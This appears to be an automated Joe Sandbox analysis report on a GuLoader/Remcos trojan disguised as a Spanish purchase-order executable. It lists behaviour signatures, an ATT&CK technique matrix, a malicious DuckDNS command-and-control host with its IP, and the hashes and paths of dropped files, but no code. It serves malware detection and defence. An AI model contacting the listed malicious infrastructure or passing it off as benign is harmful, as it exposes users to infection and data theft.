Source: | Code function: | 13_2_00407EF8 | |
Source: | Code function: | 14_2_00407898 |
Source: | Code function: | 12_2_00418981 |
Source: | Thread delayed: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | API call chain: | graph_0-2864 | ||
Source: | API call chain: | graph_0-3043 | ||
Source: | API call chain: | graph_13-33816 |
Source: | Process information queried: | Jump to behavior |
Anti Debugging |
---|
Source: | Thread information set: | Jump to behavior | ||
Source: | Thread information set: | Jump to behavior |
Source: | Process queried: | Jump to behavior | ||
Source: | Process queried: | Jump to behavior |
Source: | Code function: | 1_2_04AEDAAC |
Source: | Code function: | 12_2_0040DD85 |
Source: | Code function: | 12_2_004044A4 |
Source: | Process token adjusted: | Jump to behavior | ||
Source: | Process token adjusted: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 12_2_0041881C |
Source: | Code function: | 13_2_004082CD |
Source: | Code function: | 0_2_00406072 |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior |
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior |
Source: | Code function: | 13_2_004033F0 | |
Source: | Code function: | 13_2_00402DB3 | |
Source: | Code function: | 13_2_00402DB3 |
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
Credentials | Domains | Default Accounts | 11 Native API | 1 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 2 Obfuscated Files or Information | 11 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 112 Command and Scripting Interpreter | Logon Script (Windows) | 212 Process Injection | 1 Software Packing | 2 Credentials in Registry | 3 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | 1 Credentials In Files | 19 System Information Discovery | Distributed Component Object Model | 11 Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Masquerading | LSA Secrets | 221 Security Software Discovery | SSH | 2 Clipboard Data | 213 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Modify Registry | Cached Domain Credentials | 141 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 141 Virtualization/Sandbox Evasion | DCSync | 4 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Access Token Manipulation | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 212 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
58% | ReversingLabs | Win32.Trojan.GuLoader | ||
100% | Joe Sandbox ML |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | Joe Sandbox ML | |||
58% | ReversingLabs | Win32.Trojan.GuLoader |
⊘No Antivirus matches
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
100% | URL Reputation | malware | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
100% | URL Reputation | phishing | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
learfo55ozj01.duckdns.org | 193.222.96.21 | true | true | unknown | |
geoplugin.net | 178.237.33.50 | true | false | unknown | |
ricohltd.top | 104.21.60.38 | true | false | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true | unknown | ||
true |
| unknown | |
false | unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | unknown | |||
false | high | |||
false |
| unknown | ||
false | unknown | |||
true |
| unknown | ||
false | high | |||
false | unknown | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | unknown | |||
false | high | |||
false | unknown | |||
false | unknown | |||
false | unknown | |||
false | high | |||
false | unknown | |||
false | unknown | |||
false | high | |||
false | unknown | |||
false | unknown | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | unknown | |||
false | high | |||
false | high | |||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
104.21.60.38 | ricohltd.top | United States | 13335 | CLOUDFLARENETUS | false | |
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false | |
193.222.96.21 | learfo55ozj01.duckdns.org | Germany | 3303 | SWISSCOMSwisscomSwitzerlandLtdCH | true |
Joe Sandbox version: | 40.0.0 Tourmaline |
Analysis ID: | 1428880 |
Start date and time: | 2024-04-19 19:10:07 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 9m 16s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 16 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | z14Novospedidosdecompra_Profil_4903.exe |
Detection: | MAL |
Classification: | mal100.phis.troj.spyw.evad.winEXE@21/15@3/3 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target powershell.exe, PID 6452 because it is empty
- HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
- Not all processes where analyzed, report is missing behavior information
- Report creation exceeded maximum time and may have missing disassembly code information.
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size exceeded maximum capacity and may have missing disassembly code.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
- VT rate limit hit for: z14Novospedidosdecompra_Profil_4903.exe
Time | Type | Description |
---|---|---|
18:12:10 | Autostart | |
18:12:18 | Autostart | |
19:10:59 | API Interceptor | |
19:12:43 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
104.21.60.38 | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | FormBook | Browse |
| ||
178.237.33.50 | Get hash | malicious | Remcos, DBatLoader | Browse |
| |
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Remcos, DBatLoader | Browse |
| ||
Get hash | malicious | Remcos, DBatLoader | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | Remcos, GuLoader | Browse |
| ||
Get hash | malicious | Remcos, XWorm | Browse |
| ||
193.222.96.21 | Get hash | malicious | GuLoader, Remcos | Browse | ||
Get hash | malicious | GuLoader, Remcos | Browse | |||
Get hash | malicious | GuLoader, Remcos | Browse | |||
Get hash | malicious | GuLoader, Remcos | Browse | |||
Get hash | malicious | GuLoader, Remcos | Browse | |||
Get hash | malicious | GuLoader, Remcos | Browse | |||
Get hash | malicious | GuLoader, Remcos | Browse | |||
Get hash | malicious | GuLoader, Remcos | Browse | |||
Get hash | malicious | GuLoader, Remcos | Browse | |||
Get hash | malicious | GuLoader, Remcos | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
learfo55ozj01.duckdns.org | Get hash | malicious | GuLoader, Remcos | Browse |
| |
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
ricohltd.top | Get hash | malicious | GuLoader, Remcos | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
geoplugin.net | Get hash | malicious | Remcos, DBatLoader | Browse |
| |
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | Remcos, DBatLoader | Browse |
| ||
Get hash | malicious | Remcos, DBatLoader | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | Remcos, GuLoader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
SWISSCOMSwisscomSwitzerlandLtdCH | Get hash | malicious | GuLoader, Remcos | Browse |
| |
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
CLOUDFLARENETUS | Get hash | malicious | HTMLPhisher | Browse |
| |
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | HtmlDropper, HTMLPhisher | Browse |
| ||
Get hash | malicious | HtmlDropper, HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | Phisher | Browse |
| ||
ATOM86-ASATOM86NL | Get hash | malicious | Remcos, DBatLoader | Browse |
| |
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | Remcos, DBatLoader | Browse |
| ||
Get hash | malicious | Remcos, DBatLoader | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | Remcos, GuLoader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
37f463bf4616ecd445d4a1937da06e19 | Get hash | malicious | Vidar | Browse |
| |
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | CredGrabber, Meduza Stealer, PureLog Stealer, zgRAT | Browse |
| ||
Get hash | malicious | CobaltStrike | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | GuLoader | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | PureLog Stealer | Browse |
|
⊘No context
Process: | C:\Program Files (x86)\Windows Mail\wab.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 963 |
Entropy (8bit): | 4.995620093649274 |
Encrypted: | false |
SSDEEP: | 12:tklzTknd6CsGkMyGWKyGXPVGArwY3+8aIHrGIArpv/mOAaNO+ao9W7iN5zzkw7Rr:qlkdRNuKyGX855vXhNlT3/77Kdxtro |
MD5: | 334018F02CE31BCBB4864D602B557FE5 |
SHA1: | C6DE43E8D6B5C026C0B0A56A898A3F00B282B881 |
SHA-256: | F70CE925C3923E25A5ADB7089E7EE752E771FBD073888ABFC426138C9094F1B3 |
SHA-512: | 31EF486A2F75226594BC553CBAFA84B645B6ED456F35F363C8EFD6229F4A731981CA1B7736CD4BD739DDCA885F068E96692BB16C7A906314B52220DC63E318BB |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 8003 |
Entropy (8bit): | 4.838950934453595 |
Encrypted: | false |
SSDEEP: | 192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J |
MD5: | 4C24412D4F060F4632C0BD68CC9ECB54 |
SHA1: | 3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF |
SHA-256: | 411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE |
SHA-512: | 6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Windows Mail\wab.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15728640 |
Entropy (8bit): | 0.10805027086476268 |
Encrypted: | false |
SSDEEP: | 1536:+SB2jpSB2jFSjlK/Qw/ZweshzbOlqVqmesAzbIBl73esleszO/Z4zbU/L:+a6aOUueqVRIBYvOU |
MD5: | 9F6FBA8CABF6D4ECDD5B285F375D352B |
SHA1: | ED0D370573441F24C1FEF0F1D7A92DB58AA484D8 |
SHA-256: | 4C764E2DF9F41B915772A2259A958DB29E6476693225882D1FBAE286C22AFB41 |
SHA-512: | 75C78BF6271DBDFE3A044ADF75F84AF49867E63BD614F0A300A676A73A736432C16C2DA686177B01E01BE6018178CCD060FB009DA012AD876BFD632833046A0C |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Windows Mail\wab.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2 |
Entropy (8bit): | 1.0 |
Encrypted: | false |
SSDEEP: | 3:Qn:Qn |
MD5: | F3B25701FE362EC84616A93A45CE9998 |
SHA1: | D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB |
SHA-256: | B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209 |
SHA-512: | 98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84 |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Windows Mail\wab.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.341937514109179 |
Encrypted: | false |
SSDEEP: | 6:6l+F8slHql55YcIeeDAlKe5q1gWAAe5q1gWAv:6l/slHUec8e5BWFe5BW+ |
MD5: | B0BE059CD617302352CC046F6CC0220A |
SHA1: | 06CF6C6B151EE7C8808C2AF6D177C3C0A3896980 |
SHA-256: | 60EFD41700D8318D03BEE12AC80FFCDA030EF4131A4CDD2B220FE5897EC65D2D |
SHA-512: | E53FA0FD6447D0F2BBAFDC7A007C36627E3AB200540C12EB85F7AB82B1DBA59ADBF037D432C403A83B38EDFA45533779F92A920351B14A382434F96EC7E3B13A |
Malicious: | true |
Yara Hits: |
|
Preview: |
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Batteriforsynede\Trolddomsvirksomhederne\Laboredness.Fid
Download File
Process: | C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 338559 |
Entropy (8bit): | 7.6756920287623895 |
Encrypted: | false |
SSDEEP: | 6144:I/ZImUfg//jtgN5B76EjlzSejH9nT+6zHItGazPLRtXhu3:ITj/xgN5B5jl3jH9nT+6TuGQVRhu3 |
MD5: | FBA02C5C2E2B17B589D84B7D57D7A736 |
SHA1: | 251A31C2E3BCB544CE6431FCA1E14F4ACEF7FF42 |
SHA-256: | 274533CE689D15C8EE6611FEB429118E821E28010FD79FC57F055C0B7E0E7FF6 |
SHA-512: | 25C4B0532A4113899BE97CF62407948867670157470178607626193D34EB7EEE54C2DB72CA5D1ABCB560A4341526DE92A958A4D09102B942D0811C74ED67F09E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten\bouillonterningens.skk
Download File
Process: | C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1089 |
Entropy (8bit): | 4.741939006979892 |
Encrypted: | false |
SSDEEP: | 24:HE9gSo1DFGgLzDlcBo5AW02oIypXdMUKI:k9EThzOBo5Ar2ovSI |
MD5: | A5A3506D7A85C6A0834F9C3D27FCE6C9 |
SHA1: | DC5600F7CCD5CAF8A924B70C2F45C1D7969F0E6B |
SHA-256: | 6329AFA66841B081B1479BBF17BE5A6DAB5863E736093DA1398CCB4FD48C56EC |
SHA-512: | 608B83DC77C28C663A9108B4F935E6DB82D470FA0392BD30FE9F7DC94E57D1BFAA5749F8ED3E489DD138FD12A2A6CBC488699660E0BFA7F24A1BD66DDAC1A1FB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten\nondeferential.txt
Download File
Process: | C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 501 |
Entropy (8bit): | 4.228739463953974 |
Encrypted: | false |
SSDEEP: | 12:uHfW+5O384CuCatmRJ+8zBDg7epfF4HzZ/0d6Z9ya3Bl1SF9hm:u++5Ok7XwLep9kzZ89a3Jyhm |
MD5: | 368D84FCACBE7199AAD3FD09C7DF14A7 |
SHA1: | A5CA69A9DB10AFF8E8B7069B1800B8555B841C4D |
SHA-256: | 8BFFAB9063FF62AD2BE0622F70C9608FC039FCB4A4B1917081BD90ADC5C36935 |
SHA-512: | 9E27DBB488E00F1690086B6C1D28E1EEBFE4C1415A7A218DE93BAF210BAA26D7D8C484273AE51D269403B844C11C37832349204FAA1F7CB139585B9F7E26878E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten\z14Novospedidosdecompra_Profil_4903.exe
Download File
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 533858 |
Entropy (8bit): | 7.5110798850016085 |
Encrypted: | false |
SSDEEP: | 12288:fzA/ggggjrBj93vPbk8tGtP7ocMzAGrP+jp:U/ggggj9jpvY84mAGrPu |
MD5: | 0E1262A4CE5AC71AD5B8DF93030D61B5 |
SHA1: | EFB918EE62FF5CCA7BDC10D180C7F7837C8E2B6B |
SHA-256: | A90C7B4223BCA6A28296894C66845DE8FB61E7028B9C45AB8E0EC7D27DB0BF71 |
SHA-512: | A799094BDAE022E92F77C002DC03D0DA004982AAA973EFE35DC6E72E40A5E9549927C7A831331218BB15478F24CC0B7ED9E7D94A0D1F3ABA103B49E68BD0064D |
Malicious: | true |
Antivirus: |
|
Preview: |
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten\z14Novospedidosdecompra_Profil_4903.exe:Zone.Identifier
Download File
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 26 |
Entropy (8bit): | 3.95006375643621 |
Encrypted: | false |
SSDEEP: | 3:ggPYV:rPYV |
MD5: | 187F488E27DB4AF347237FE461A079AD |
SHA1: | 6693BA299EC1881249D59262276A0D2CB21F8E64 |
SHA-256: | 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309 |
SHA-512: | 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Hustle118\Foundering\Ljtnanterne\Unstraightness\Holomorph196.mil
Download File
Process: | C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4056 |
Entropy (8bit): | 4.860550085125353 |
Encrypted: | false |
SSDEEP: | 96:prxhfa2NwGYhNj+RR6UclY+w7RXMru7+AdWrY9NaR95:pr/lNChNy7cCtRcS2eI95 |
MD5: | 4E679D550C231C35094FEFB645F0D0B4 |
SHA1: | 26E9E728DCDA9CE0A9427DE64A8365DDB24090E2 |
SHA-256: | 3FCA5795690F2D6553CA5845BF9B122051AB8B7C05896078541A14DE00FB6BD7 |
SHA-512: | E0380BE7BED7AB78208FA0694FEDD3F5512BC6DDA0C29C3895DB4E6F814FC719DCFE933D1EC871B75FBD7B436C2C57BB0FCF9ACFB64E171C01C022B36F73F4BA |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Hustle118\Foundering\Ljtnanterne\Unstraightness\Slumretppe.hor
Download File
Process: | C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4996 |
Entropy (8bit): | 4.9612676235687445 |
Encrypted: | false |
SSDEEP: | 96:v48YsRVEpylVQratXvDeUeYSi80KFuwczSfTS48Bacs/OMRK2BL0Ab:v4XsRVCr0b/80KFuwNnA8OMRK2R0Ab |
MD5: | 3BF82F450A0DFD86F29536257623E2AD |
SHA1: | 286877538EC1D1D41A9819596B41B0289509CB51 |
SHA-256: | 614BB44D24BBB3B890649867E13FB15D86E5EA73179FD44E716B10FFCAA3C7C0 |
SHA-512: | 8B4CAD6568B4503E6E4171D22B8DB89E54449BF98D28C0D4D9F207AAAF56005E3406C8160A8365037F36CC4A7E4C537455ED6632371E2104CB718EC18C13D3CB |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 61111 |
Entropy (8bit): | 5.357134631016563 |
Encrypted: | false |
SSDEEP: | 1536:oKohIDhrU/xqIsVWUQ7IQp0lYmDc+m4PsrHLc:oJhI5U/xKWLpwon4Ps7Lc |
MD5: | 867B6E69EAF64D49C92A00EFE2F3484A |
SHA1: | 57E409C3C4EC17F05DE4B6900300C6FFB22447C7 |
SHA-256: | 554A9D36104F6FE2C57EBEF379F96ADB5205F4652780C0459DB40E676F5EFA1C |
SHA-512: | 3D075D6850562B2F68503E48F9349A50DCF65E69626B85B5312BF0BD6938B3B433CAFB3ED4F885B392C4157B6997613EA551729A35028F5BE1151AC3FEDA1856 |
Malicious: | true |
Preview: |
File type: | |
Entropy (8bit): | 7.5110798850016085 |
TrID: |
|
File name: | z14Novospedidosdecompra_Profil_4903.exe |
File size: | 533'858 bytes |
MD5: | 0e1262a4ce5ac71ad5b8df93030d61b5 |
SHA1: | efb918ee62ff5cca7bdc10d180c7f7837c8e2b6b |
SHA256: | a90c7b4223bca6a28296894c66845de8fb61e7028b9c45ab8e0ec7d27db0bf71 |
SHA512: | a799094bdae022e92f77c002dc03d0da004982aaa973efe35dc6e72e40a5e9549927c7a831331218bb15478f24cc0b7ed9e7d94a0d1f3aba103b49e68bd0064d |
SSDEEP: | 12288:fzA/ggggjrBj93vPbk8tGtP7ocMzAGrP+jp:U/ggggj9jpvY84mAGrPu |
TLSH: | 5FB4E1ABEB908526D93807B4E973C1181B749C963E71DF4F07897460AFF738238A9617 |
